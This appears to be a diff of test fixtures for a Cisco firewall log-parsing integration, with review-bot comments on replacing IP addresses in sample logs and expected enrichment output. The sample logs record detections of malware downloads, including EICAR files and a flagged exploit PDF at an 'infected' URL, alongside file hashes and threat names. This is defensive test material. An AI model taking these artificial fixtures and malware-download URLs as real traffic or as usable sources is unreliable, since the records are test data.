9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d 
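Review bot: Both changed lines now point at the same destination, 81.2.69.144, where the old fixture used two distinct hosts (213.211.198.62 for the eicar download and 18.197.225.123 for the PDF), so the regenerated expectations for these two 430005 events carry identical destination.geo and destination.as blocks and the test can no longer distinguish a pipeline that enriches each event from one that reuses a stale lookup. If the supported test subset offers more than one address, consider giving the second event (`DstIP: 81.2.69.144, ... URI: http://81.2.69.144/public/infected/...`) a different member of that subset so the two expected geo/AS results differ; I cannot see the subset's extent from this diff. The substitution itself is the right move: fixtures keyed to live third-party addresses drift whenever the GeoIP database is refreshed, which is presumably what prompted the change.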
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json index b010166df41..12dc3d022ad 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935852844Z", + "ingested": "2021-12-09T13:33:14.721617600Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935865544Z", + "ingested": "2021-12-09T13:33:14.721627200Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", 
@@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935868496Z", + "ingested": "2021-12-09T13:33:14.721633400Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935870547Z", + "ingested": "2021-12-09T13:33:14.721639600Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", 
@@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935872479Z", + "ingested": "2021-12-09T13:33:14.721645500Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935874404Z", + "ingested": "2021-12-09T13:33:14.721651700Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", 
@@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935876299Z", + "ingested": "2021-12-09T13:33:14.721657700Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,25 +758,25 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, - "ip": "213.211.198.62" + "ip": "81.2.69.144" }, "source": { "port": 46004, @@ -828,7 +828,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { 
@@ -836,8 +836,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935878168Z", - "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", + "ingested": "2021-12-09T13:33:14.721663800Z", + "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", "start": "2019-08-16T09:39:02Z", 
@@ -866,7 +866,7 @@ "file_sandbox_status": "File Size Is Too Small", "uri": "http://www.eicar.org/download/eicar_com.zip", "file_sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "file_size": "184", "src_port": "46004", "src_ip": "10.0.1.20", @@ -950,7 +950,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935880107Z", + "ingested": "2021-12-09T13:33:14.721669900Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", 
@@ -1005,25 +1005,25 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "18.197.225.123", + "address": "81.2.69.144", "port": 80, - "ip": "18.197.225.123" + "ip": "81.2.69.144" }, "source": { "port": 47926, @@ -1032,9 +1032,9 @@ }, "url": { "path": "/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", - "original": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "original": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "scheme": "http", - "domain": "18.197.225.123" + "domain": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ ], "ip": [ "10.0.1.20", - "18.197.225.123" + "81.2.69.144" ] }, "host": { 
@@ -1082,8 +1082,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935882011Z", - "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "ingested": "2021-12-09T13:33:14.721675800Z", + "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", "start": "2019-08-16T09:42:06Z", 
@@ -1111,9 +1111,9 @@ "first_packet_second": "2019-08-16T09:42:06Z", "file_sandbox_status": "Failed to Send", "threat_score": "100", - "uri": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "uri": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "file_sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7", - "dst_ip": "18.197.225.123", + "dst_ip": "81.2.69.144", "file_size": "278987", "src_port": "47926", "src_ip": "10.0.1.20", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log index 3caf6780a5c..65034c68c48 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log 
@@ -1 +1 @@ -2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico +2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, 
IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json index 486bbc39f43..66994577c9e 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json 
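Review bot: The rewritten `+` line sets both `SrcIP` and `DstIP` to `81.2.69.144`, so the sample now describes a host talking to itself and the expected output (the `@@ -10,43`, `@@ -95,8` and `@@ -140,9` hunks of the `-expected.json` below) can no longer distinguish a source/destination mix-up in the pipeline from correct behaviour: `source` and `destination` carry identical geo and AS enrichment and `related.ip` collapses from two entries to one. The sample also still says `SecIntMatchingIP: Destination`, which loses its meaning once both ends are the same address. Using two distinct addresses from the supported subset, e.g. `SrcIP: <SECOND_SUPPORTED_IP>, DstIP: 81.2.69.144`, keeps the field mapping observable and `related.ip` at two elements.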
@@ -10,43 +10,52 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 3215,
+ "number": 20712,
 "organization": {
- "name": "Orange"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "2.2.2.2",
+ "address": "81.2.69.144",
 "port": 80,
 "bytes": 246,
- "ip": "2.2.2.2",
+ "ip": "81.2.69.144",
 "packets": 4
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Seattle",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -122.3451,
- "lat": 47.6348
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "3.3.3.3",
+ "address": "81.2.69.144",
 "port": 65090,
 "bytes": 729,
- "packets": 4,
- "ip": "3.3.3.3"
+ "ip": "81.2.69.144",
+ "packets": 4
 },
 "url": {
 "path": "/favicon.ico",
@@ -95,8 +104,7 @@
 "CISCO-SENSOR-3D"
 ],
 "ip": [
- "3.3.3.3",
- "2.2.2.2"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -110,8 +118,8 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-07-19T09:06:55.879883471Z", - "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", + "ingested": "2021-12-09T13:33:16.993211300Z", + "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: 
HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", "start": "2020-03-01T01:02:16.000Z", @@ -140,9 +148,9 @@ "responder_packets": "4", "access_control_rule_action": "Allow", "nap_policy": "State-Backbone", - "dst_ip": "2.2.2.2", + "dst_ip": "81.2.69.144", "ac_policy": "COOL-POLICY-3D", - "src_ip": "3.3.3.3", + "src_ip": "81.2.69.144", "protocol": "tcp", "application_protocol": "HTTP", "initiator_bytes": "729", diff --git a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log index d52c0d7b1b8..17ba60830b8 100644 --- a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log +++ b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log 
@@ -1,19 +1,19 @@ -Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet -Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet -Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet -May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets -Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet -Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet -Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet -Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets -Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet -Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet -Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets -Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets -Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet -Mar 24 18:06:03 198.51.100.2 
1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021 -Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9) -Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 -Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 -Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0 -Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19 \ No newline at end of file +Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet +Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet +Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet +May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets +Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet +Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet +Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 
